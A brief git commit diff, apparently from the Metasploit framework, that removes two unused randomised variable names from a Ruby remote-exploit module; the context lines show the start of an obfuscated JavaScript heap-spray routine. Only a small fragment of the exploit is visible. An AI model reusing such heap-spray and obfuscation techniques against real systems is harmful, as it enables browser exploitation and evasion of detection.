Removed unused variables

unstable
Sam Sharps 2012-01-12 18:05:54 -06:00
parent 87ee6905df
commit f22f54034a
1 changed files with 0 additions and 4 deletions

View File

@ -98,10 +98,6 @@ class Metasploit3 < Msf::Exploit::Remote
var_title = rand_text_alpha(rand(100) + 1)
func_main = rand_text_alpha(rand(100) + 1)
var_spray = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(100) + 1)
var_memory = rand_text_alpha(rand(100) + 1)
heapspray = ::Rex::Exploitation::JSObfu.new %Q|
function heapspray()
{